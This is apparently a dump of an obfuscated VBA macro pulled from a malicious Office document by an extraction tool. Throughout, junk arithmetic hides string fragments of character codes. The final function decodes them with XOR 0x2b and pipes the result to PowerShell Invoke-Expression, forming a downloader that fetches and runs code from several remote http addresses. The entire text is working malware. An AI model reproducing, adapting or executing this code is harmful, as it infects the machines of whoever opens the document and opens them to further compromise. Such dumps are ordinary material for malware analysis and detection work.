Filename     : ./macros/dda254523e025c91d624920c0c4b4cf9adfa649cc64ac4acd2f2e028d3a5d083
OLE stream   : Macros/VBA/qUlYVTzaYFu
VBA filename : qUlYVTzaYFu.bas
----------------------------------------
Attribute VB_Name = "qUlYVTzaYFu"
Function zrqEm()
On Error Resume Next
CKXnLY = 94157 + 62456
vDYXmi = 53652 / 26609
linnOu = MREiAk * CSng(71780 * Fix(65793)) * BOpKcO + CSng(IFGJJ + CLng(wahijo)) / (zspjl * CSng(94918) - (85862 + Fix(iuRZp) - (77767 + CLng(KHVEW - Log(ihIliY) - 40314 + Int(ASDzPB)))))
ZnAlww = BuAVT
YIZiV = Atn(iLokTz + Sin(PaMcRo) - 36481 / 21705)
CRzFnsUIqF = "ell  [sTR" + "ing]::jOin" + "('' ,(( 15, " + "81, 93,66,102 ," + " 110 , 11" + " , 22, 11,69,7"
PZhPa = 10918 + 52894
tMuYE = 45761 / 8709
bizrNV = wwAja * CSng(15728 * Fix(87456)) * mdbPD + CSng(tSpNu + CLng(zpXDWm)) / (wECtka * CSng(36968) - (5772 + Fix(AlstVN) - (90404 + CLng(wpYPhP - Log(iThHI) - 49394 + Int(NoMuHk)))))
aGKCHA = CmzDJS
rpjNvR = Atn(UASlu + Sin(FjNjQo) - 89088 / 29880)
GdCpYOMhlJ = "8 , 92, 6,68" + " ," + "73, 65 , 7" + "8,72, 95,"
VNoqh = 50943 + 60862
mjwcj = 63927 / 14355
SqUZvX = WNjQT * CSng(83997 * Fix(59506)) * iwfZdi + CSng(qFwdqh + CLng(NqiBwo)) / (ihERk * CSng(30159) - (69695 + Fix(twXqd) - (10670 + CLng(BBBAbz - Log(aRhlm) - 533 + Int(mSvqQA)))))
czNEcZ = IlUjCa
bItOG = Atn(MAGzD + Sin(UpczwM) - 39746 / 38340)
YJFFXzf = " 11, 8" + "9 ,74 ," + " 69 ,79,68 " + ", 7"
hhIfA = 18112 + 36412
Xzkijo = 81719 / 1665
ivjJoY = lWmETi * CSng(99907 * Fix(82039)) * sPjrK + CSng(oRfbCR + CLng(EjwNd)) / (RXSlV * CSng(26157) - (41 + Fix(tzHhhq) - (66980 + CLng(lZbnmG - Log(iNVdR) - 34901 + Int(GGAiY)))))
CRhMGL = dtMuFU
aiOdK = Atn(uUYtVa + Sin(RvYlpi) - 21011 / 17449)
ptbMwEzwZDJ = "0," + " 16" + " ,15 ,68 ," + "79" + " ,12" + "3 , 120,106, " + "11 ,22 , 11,69 "
DfAKi = 39983 + 20293
zitqRW = 81076 / 22655
NsmGOt = NGiXMS * CSng(16251 * Fix(8319)) * oMnMp + CSng(OhDzhC + CLng(iHjWGE)) / (ZAwEBj * CSng(11668) - (30760 + Fix(HiubuV) - (42806 + CLng(zGPdED - Log(MZhcW) - 83574 + Int(LEPjoP)))))
hGwmw = iFHwZ
LIswzv = Atn(mbkIl + Sin(YAoKUw) - 64189 / 85570)
wWAmE = ", 7" + "8 ,92" + ", " + "6," + "68,73 ,65," + " 7" + "8 , 72 , 9" + "5, "
wTksRL = 30114 + 9551
ZlwhEd = 74183 / 98005
riqjJ = FIiuw * CSng(29726 * Fix(43350)) * izmBRf + CSng(ojSdC + CLng(IwALa)) / (CpYIC * CSng(78095) - (15756 + Fix(wdDdi) - (49688 + CLng(FsiJzZ - Log(DzXGGE) - 93187 + Int(ijVIU)))))
HZFGz = uvnSf
GrkNJG = Atn(Lfpvc + Sin(CFVCc) - 65024 / 10562)
YSTKDliERKE = "11,12" + "0 ,82 , 88 , 95" + ",78 , 70,5, 1" + "01 , 78," + " 95 , 5 , 12" + "4,78,73 ,104,"
ThLilt = 9648 + 17890
DouvBI = 75097 / 60380
taOzjG = fFdfMK * CSng(65923 * Fix(40532)) * LDDaG + CSng(PauFDk + CLng(Sjhpo)) / (zrGTv * CSng(13002) - (31303 + Fix(pziJzq) - (13572 + CLng(qBjaEL - Log(EaCDcn) - 87991 + Int(WWUVfE)))))
bVGsP = zlNoiw
ITqGZa = Atn(wEuwr + Sin(jGNKnD) - 4295 / 85040)
wCOcnMdcLnz = "71,66,78," + " 69,95 ,1" + "6 ,15,73 ," + " 96,95 ,81 ,81 " + ",102 , 1" + "1 , 22, 11 , 12" + ",67,95,95,91, " + "17"
fvARQ = 17044 + 19129
lHipXY = 143 / 33635
cCrPPB = iYHJY * CSng(51046 * Fix(40854)) * mnqdM + CSng(pNNuv + CLng(wukri)) / (lwTPc * CSng(99440) - (66623 + Fix(HohVZh) - (19645 + CLng(OdZfz - Log(mpiVUs) - 26357 + Int(oPiDoW)))))
WtnXsS = lVmlJm
WKrub = Atn(BfrUNw + Sin(fGSwY) - 9559 / 23125)
wtZko = " ," + "4 ,4 ," + "81 , 74 ,7" + "7, 74 ,79 ,68,"
HupDh = 95030 + 62597
vTTjWt = 31211 / 2819
jKYlDM = EVBOB * CSng(96156 * Fix(38339)) * BnokN + CSng(SaVwG + CLng(viUSU)) / (rJdzG * CSng(30088) - (41782 + Fix(QRkukC) - (76624 + CLng(nPtNTb - Log(jDmwp) - 18388 + Int(AiurG)))))
twdCl = VwmoQt
hChYO = Atn(mAqaOE + Sin(LuEZGq) - 31144 / 83939)
tnBLOV = "5, 72,68 ,7" + "0 ,4 ,74, 88 " + ", 91,69, 78,95" + " , 116,72" + " ,71, 66 , 78 " + ",69,95, 4, 8" + "1 ,124,111 ," + " 65 , 76, 90" + ", 105 ,1" + "08 ,4, "
YrGzcv = 18662 + 75722
AmIsTP = 14184 / 82396
qSoGO = iJtko * CSng(49394 * Fix(40064)) * FJIWD + CSng(DbazS + CLng(baZRUr)) / (sGKNf * CSng(38586) - (30929 + Fix(cvjED) - (7339 + CLng(AoTZFi - Log(OsonTd) - 15334 + Int(bQzMcB)))))
iEsqWR = VizsYc
vdCnsb = Atn(uvPqra + Sin(zvmivr) - 35111 / 49443)
ipzZwYbdv = "107,67 , 95" + " ,95,91 ,17 , " + "4, 4 , 26 , 26" + " , 27 , 79, 6" + "9 ," + " 74,5 ,72 ,68," + "70, 5 " + ", 72, 69 " + ",4 , 91,"
zrqEm = CRzFnsUIqF + GdCpYOMhlJ + YJFFXzf + ptbMwEzwZDJ + wWAmE + YSTKDliERKE + wCOcnMdcLnz + wtZko + tnBLOV + ipzZwYbdv
End Function
Function wHfNAcj()
On Error Resume Next
hzdVLi = 62652 + 18296
twwhM = 75946 / 85347
WlBBji = foYPI * CSng(41319 * Fix(85658)) * YUvZJ + CSng(jTYAa + CLng(puwMuZ)) / (WFUQDm * CSng(41006) - (34889 + Fix(zMdMH) - (42624 + CLng(qjGzIp - Log(dAJqX) - 71089 + Int(MUjuWC)))))
SlTsnq = LFMwR
DsmoC = Atn(ULXNkT + Sin(FdoZSh) - 76571 / 82626)
tScnIab = " 74,81,65 , 79" + ", 114, 4 ,107," + " 67,95" + ", 95,91," + "17, 4 ,4 ," + "92 , 92,92 , 5 " + ",78"
vFDnmi = 62028 + 19624
zrdZHI = 76903 / 84069
pONnwq = VPjTiv * CSng(99975 * Fix(99906)) * SmUON + CSng(qYnwq + CLng(taEMjq)) / (EfzsdU * CSng(69102) - (95322 + Fix(wwzFD) - (67742 + CLng(vLvOV - Log(oAAzv) - 54129 + Int(cHuFEv)))))
uBIKB = UClww
Suqtd = Atn(aaowl + Sin(KGJAnc) - 51360 / 63577)
qMHSNI = ",74 , 73,72" + ",72 ,73 , 90,7" + "9 " + ",5" + ", 72" + " , 68 , 70 " + ",4,92,12"
LBOER = 66428 + 36527
ElKkjw = 84674 / 64903
HcdOj = CNTVN * CSng(74868 * Fix(66352)) * EjizEH + CSng(krckdo + CLng(PVpaUk)) / (RXudiw * CSng(15315) - (67147 + Fix(kJfaw) - (58265 + CLng(SiLbX - Log(BdDiMz) - 97340 + Int(nRzpmM)))))
JShvIB = VJJDE
WVJXBb = Atn(awOtlz + Sin(wJJYf) - 43419 / 31941)
wGsdYBN = "1 ,121,104 ," + " 28 , " + "102 , 88 ,12" + "3 , 8" + "9 ,120,4 , " + "10" + "7,6"
TLzHr = 15595 + 77478
zaMZd = 45954 / 4304
HpXvR = MRrui * CSng(32144 * Fix(56630)) * TSbnIF + CSng(WMMVn + CLng(wlcFj)) / (UCcJAq * CSng(57893) - (83786 + Fix(ROVnn) - (68498 + CLng(jfDzjN - Log(cKadEO) - 61804 + Int(pwXJj)))))
XQdDC = EGVVN
IbziNz = Atn(wrhAj + Sin(EwBjK) - 13889 / 35021)
hPNNLlWXl = "7,95 ,95 , " + "91 ,17 , 4, 4 ," + " 92 ,9" + "2,92" + " , 5, 74 , 69" + ", 70 ,66,69," + " 7"
wHfNAcj = tScnIab + qMHSNI + wGsdYBN + hPNNLlWXl
End Function
Function zACzIFvYvm()
On Error Resume Next
iTsdVI = 53404 + 37361
TMrliV = 31263 / 44063
ONBOqJ = kEkbC * CSng(47009 * Fix(38899)) * WjDfr + CSng(NotlVf + CLng(jDVwim)) / (DboLP * CSng(5320) - (42592 + Fix(lmiGw) - (52784 + CLng(pEvbr - Log(YIcUd) - 38218 + Int(AOfTm)))))
KTnOL = NimSDV
NurrQ = Atn(ZwCHHP + Sin(GdOQAH) - 89368 / 16616)
mOAoE = "6, 88 , 66" + ", 5 ,72 , 68," + " 70 ,4 ,92 , 91" + ",6 , 72 ,68"
UFwNX = 74597 + 96992
bjwIv = 18172 / 38502
MrCibi = fGDjf * CSng(1283 * Fix(93857)) * tsSPDV + CSng(cFJSr + CLng(oVwdYb)) / (cljjTM * CSng(98800) - (61806 + Fix(XpAXJ) - (6900 + CLng(FWvJr - Log(zYInO) - 82263 + Int(FDHYwT)))))
bZqvJX = EnCCPE
LiwqW = Atn(NiTSTc + Sin(ztGdSH) - 24153 / 75965)
ZsPsd = " , 69 ,9" + "5, 78 ,69 , 9" + "5 , 4,27 ,6" + "4, 89 ,98,97,10" + "5 ,4,10" + "7 ,67 " + ",95,9" + "5 , 91 , " + "17 ,4, 4,92,"
TmFlLw = 58081 + 13294
tGjPY = 85028 / 21293
GUEHQs = tDOlq * CSng(87881 * Fix(73513)) * pWjYiF + CSng(XCkML + CLng(JzXEU)) / (jaFPKM * CSng(50218) - (16899 + Fix(BTzZAQ) - (91267 + CLng(QFclww - Log(WDjKj) - 12159 + Int(jWKDOk)))))
dPzBLj = uYolaS
WLEwL = Atn(ikmLm + Sin(HHwrw) - 73994 / 58331)
rlpKXwEuU = " 9" + "2, 92 ,5,93 ,7" + "4, 71 , 78 ," + " 89 ,66" + ",74 " + ",7" + "6 , 94," + "81," + " 78 ,71 " + ",71, 66"
QUXVwj = 66185 + 58656
Fumzs = 60165 / 61369
QkjNP = oXTLvH * CSng(44315 * Fix(28230)) * DYNETJ + CSng(ElGpL + CLng(DtbEwE)) / (QiWiOj * CSng(33131) - (33925 + Fix(XitGl) - (35079 + CLng(WiKBP - Log(vGZUwT) - 49306 + Int(rISiUY)))))
aXRtX = oZJfqj
ipksj = Atn(OcvFGl + Sin(FaoCR) - 70722 / 68915)
iPPcKJazkh = " , 64, 5 ,7" + "2 , 68, 70 " + ",5 , 95, " + "89 , 4," + " 69," + "73, 109 , 69, "
dPqiFd = 31967 + 38949
kIbZh = 65775 / 46344
Qjomd = wvrKiF * CSng(40784 * Fix(64043)) * rwSmOs + CSng(uDlbiw + CLng(mBPCJ)) / (hFkKs * CSng(53432) - (27346 + Fix(jwYIhB) - (83104 + CLng(LiFYi - Log(lACQCj) - 10421 + Int(TDLaH)))))
VzHuFz = lTtjc
LHtmiw = Atn(ENSzu + Sin(dqkwl) - 54202 / 83559)
zaJiPbwcOvi = "99,28 , 74, 64 " + ", 100," + " 65 , 4,12, 5" + ",120," + "91" + " ,"
njTHJc = 34709 + 65872
IrdKLY = 12273 / 6761
ZwQSb = RMwQpZ * CSng(84609 * Fix(41408)) * ASjmzc + CSng(vPnzZI + CLng(YGGzO)) / (JdnVE * CSng(37411) - (12443 + Fix(QmHvNi) - (14136 + CLng(wfidhC - Log(iiaJu) - 46493 + Int(jcdzf)))))
RPwkLl = CHmXYz
fKijW = Atn(fcfBLi + Sin(hKaOk) - 80883 / 13777)
oKFTlhGVK = "71" + " , " + "66,95 " + ", 3, 12, 10" + "7 , 12 ,2, 16" + " ,15, 90 ,92"
zACzIFvYvm = mOAoE + ZsPsd + rlpKXwEuU + iPPcKJazkh + zaJiPbwcOvi + oKFTlhGVK
End Function
Function miTYzwJS()
On Error Resume Next
OfkqzI = 25903 + 87304
aPBoM = 54717 / 61274
YtXSE = KWYYA * CSng(69499 * Fix(91526)) * ZWYiMc + CSng(jDIOP + CLng(biGuRY)) / (ZroTr * CSng(61421) - (93342 + Fix(wAzsT) - (99277 + CLng(UbiAQ - Log(opODp) - 83515 + Int(nSdiLn)))))
Rjftb = XrUkRD
ihEmj = Atn(nlDJWv + Sin(QOiQRH) - 7124 / 70864)
uMFqIMQU = " ,101,66 ,121" + " ,11 ,22 ,11, 1" + "5,81, 93" + " , 66,102 , 110" + " , 5" + ",69 ,"
FhuMSZ = 76748 + 24836
crcdMr = 97100 / 68049
EjVhH = ksTKFh * CSng(84595 * Fix(80688)) * lpbHZ + CSng(XmhPUi + CLng(cuCrJ)) / (cvYui * CSng(65956) - (12572 + Fix(QGzENr) - (57476 + CLng(dzjnUj - Log(nRmGdP) - 48042 + Int(NYrNU)))))
VdJNiA = UAaRC
uzZSU = Atn(jkLHr + Sin(BQFLVf) - 90969 / 97126)
imniOhR = "78" + " , 83 ,95, 3," + "26, 7" + ",11 ,18,28, 29," + "26 ,27, 27 , 2 " + ",16 ,15, 70, " + "125 ,6" + "6, 104 ,94 , 1"
fOzOI = 5218 + 4707
VBbUjh = 95002 / 64564
MSVcR = wpHOh * CSng(2225 * Fix(59820)) * OUoiED + CSng(fUhhW + CLng(Niwjv)) / (iJKnkQ * CSng(90449) - (20266 + Fix(sMjBbt) - (682 + CLng(ZZwwAj - Log(ouvtjL) - 17981 + Int(lUBcDj)))))
QzwVIo = itoqO
RJtVn = Atn(wjvTN + Sin(YKzidc) - 25719 / 98706)
fvjIYfS = "1, " + "22,11 ,1" + "5, 78" + " ," + "69 ,93 ,17 , 95" + " , 78 ,7" + "0,91, 11," + " 0" + " , 11 ,"
aWLkU = 77353 + 72609
qsUkAZ = 68806 / 69601
zphOw = SBDbA * CSng(97071 * Fix(40195)) * QBCBJ + CSng(wjYJbU + CLng(FIwNJv)) / (QHQHL * CSng(62856) - (74736 + Fix(pNpQfX) - (11402 + CLng(iSiIZ - Log(RYmbj) - 25002 + Int(FOrCSl)))))
wNMlzZ = cCREXG
kupcq = Atn(tKTKp + Sin(zwQui) - 75890 / 54765)
dFRPtOuY = "12" + ", 119 ,1" + "2, 11" + ", 0 ,11,15," + "90,92 , 101,66 " + ", 121,11 ,0 ," + " 11 , 12, " + "5,7" + "8, 83 , "
cmcNu = 79137 + 38134
Eqvdj = 28644 / 44009
PqmSs = FbQlJ * CSng(22120 * Fix(40985)) * cSCYcR + CSng(VXcjns + CLng(YMovfk)) / (WzihNX * CSng(50713) - (2195 + Fix(NujiK) - (19013 + CLng(WMClt - Log(JjEjI) - 6711 + Int(wOfkw)))))
WzOzjE = nfwHjZ
SXrPu = Atn(UEOoE + Sin(nOASi) - 56525 / 98866)
wYTplKRvlY = "78,1" + "2 ,16, 77,6" + "8 , 89" + ",78 ,74,7" + "2 , 67 , 3 ,15" + " ,66 , 120 ," + "123 , 65" + " ,69," + " 11, 66" + " , 69 "
uuATU = 78594 + 7729
jfspIV = 82925 / 69872
fCltBc = OifiXh * CSng(29349 * Fix(49335)) * hiXMn + CSng(VPfqvA + CLng(NtissU)) / (OmDOL * CSng(32344) - (26854 + Fix(FBjfUv) - (71865 + CLng(RrqtjV - Log(KhblV) - 72722 + Int(fovNqv)))))
EpIIp = VmLjz
IBWYuK = Atn(KPfjcH + Sin(BCafs) - 46328 / 87334)
OQYikh = ",11, 15,73 " + ", " + "96 ,95" + ", " + "81 , 81 ,102, 2" + ",80 " + ",95,89, 82,80 "
wEtij = 57902 + 73940
jWtKJp = 70854 / 17996
hwXkb = rfEBI * CSng(37338 * Fix(60368)) * cmwHL + CSng(FthotP + CLng(azLcrE)) / (aGSXh * CSng(46227) - (53836 + Fix(iJajmY) - (54633 + CLng(fYSDO - Log(RirLiR) - 61054 + Int(YROPzW)))))
WaGmE = fwwduU
bZnGP = Atn(XOMdP + Sin(sfDYBA) - 72923 / 78399)
plYVYlz = ", 15 , 68," + "79, 123,120 ," + "106 , " + "5 ,111,68, " + "92 ,69 " + ", 71," + "68,74 ,79 , " + "109 ,66 , " + "71, 78 ," + " 3,15 ,66"
hPTmNV = 85376 + 26259
iVwKQ = 71431 / 54204
LhkuD = wFUmEv * CSng(13704 * Fix(78639)) * GaFtEC + CSng(uPBpd + CLng(XcPQEI)) / (YCKvl * CSng(1217) - (86604 + Fix(HPjaa) - (52804 + CLng(nQzJMD - Log(VtNQEi) - 85242 + Int(nqzaS)))))
bAIdWG = FDEzVa
QJHDI = Atn(mzSODQ + Sin(pzRuvK) - 73316 / 64990)
VajWNTmVBqd = ",120,123, 65,6" + "9 , 5, 127" + ",6" + "8," + " 120, 95, 8" + "9,66 ,69 ,76, " + "3,2 , 7, " + "11 ,15,70 ," + "125, 66 , 1"
NosCWW = 92505 + 6584
odwXB = 20697 / 65789
jVzal = wiBWZ * CSng(76269 * Fix(5681)) * MSsZp + CSng(FmLpjI + CLng(RNOGw)) / (kbIXf * CSng(12150) - (95991 + Fix(WwzBL) - (19386 + CLng(fkdwGL - Log(uJJrc) - 99688 + Int(UnQdPS)))))
vrBao = cPYaG
EvMTrn = Atn(oMoYwa + Sin(dkJpMa) - 64169 / 97283)
JAcqM = "04, 94 , " + "2 , 16, 12" + "0 ,95 , 7" + "4 ,89 , 9" + "5 , 6, 12" + "3 ,89,68 , 7" + "2 ," + "78 ," + "88, 88," + "11 , 1"
miTYzwJS = uMFqIMQU + imniOhR + fvjIYfS + dFRPtOuY + wYTplKRvlY + OQYikh + plYVYlz + VajWNTmVBqd + JAcqM
End Function
Function MHHijhQQmj()
On Error Resume Next
UTiYuq = 5771 + 13515
QpvBW = 40496 / 14481
DswGiY = tPhdiR * CSng(55407 * Fix(13944)) * LpTja + CSng(zaBsUw + CLng(dKHbj)) / (wCUGsm * CSng(42272) - (16818 + Fix(dSDqXz) - (67111 + CLng(jaNOs - Log(EpDrU) - 72789 + Int(VDikI)))))
VFOcr = IjJjl
qiauE = Atn(Hzjpib + Sin(uIYBVd) - 11884 / 60584)
dhfuLPzMw = "5, 70 , 125" + " ,66 , 1" + "04, 94" + ", 16 ,73," + " 8" + "9, 7" + "8 , 74, 64 , " + "16 , 86 ,72," + " 74, 95,72 ," + "67 ,80, 92, "
UzZPu = 83208 + 27789
fzmABP = 24060 / 94514
CMHCra = lwCIm * CSng(81420 * Fix(40743)) * YNzCp + CSng(ULuVG + CLng(RQjHfG)) / (MIwMk * CSng(33654) - (2124 + Fix(hHawj) - (98574 + CLng(ACwoYi - Log(ANhliA) - 41236 + Int(udfjI)))))
CqTaB = Djquwt
aANlo = Atn(nETWWw + Sin(PiLqhb) - 59179 / 14682)
lRLXIJZFhN = "89 ,66," + " 95 ,78,6 " + ", 67, 68, 88,9" + "5 ,11, 1" + "5 , 1" + "16,5 ,110," + " 83, 72 ,78" + ",91 , " + "95, 66"
OhPFn = 67505 + 73524
frMrHa = 78892 / 21638
EiEpVN = opXsWD * CSng(38483 * Fix(12366)) * pccnz + CSng(kLrUkF + CLng(wbdKUw)) / (OljVF * CSng(91288) - (1941 + Fix(DWGub) - (93432 + CLng(LGwzT - Log(szAdsD) - 87642 + Int(OLjVuE)))))
YhsMO = Qzjfld
wHhCj = Atn(HUNqd + Sin(fQWMUi) - 35588 / 41516)
jCViUviTRd = ",6" + "8 , " + "69 ,5 ,102,78" + ",88,88" + " , 74" + ", 76 ,78,1"
mPPOfr = 99349 + 27700
YXFXz = 93859 / 43040
biQQPV = cnSJq * CSng(33518 * Fix(93784)) * SBYvXv + CSng(kKsFzc + CLng(vzLJhF)) / (wzjvm * CSng(13552) - (84607 + Fix(UwVST) - (91914 + CLng(TErwow - Log(YKXhj) - 85355 + Int(zjjrl)))))
lahaa = FGItjP
Dozko = Atn(SqvjfJ + Sin(RdHSlQ) - 22904 / 82707)
fzqALQqsv = "6 , 86" + " ,8" + "6) | " + "%{[cHar] ( $" + "_ -BxoR" + Chr(34) + "0x2b" + Chr(34) + ")}" + " )) | " + ".( "
bsYlbs = 81925 + 28741
PwfcNb = 88810 / 13506
bZiiPb = QvVUjz * CSng(8150 * Fix(53634)) * qwBLd + CSng(fbwzi + CLng(lYEfAn)) / (HvwPdb * CSng(84028) - (96894 + Fix(vwdow) - (28154 + CLng(uoDUEu - Log(hSzwi) - 44394 + Int(ofKEU)))))
Tkcmq = PUijZ
uiYjlY = Atn(jAUpj + Sin(nKrwT) - 90408 / 25693)
XmZZBPP = "$eNv:C" + "omsPe" + "c[4,15,25]-J" + "oI" + "N'')"
MHHijhQQmj = dhfuLPzMw + lRLXIJZFhN + jCViUviTRd + fzqALQqsv + XmZZBPP
End Function

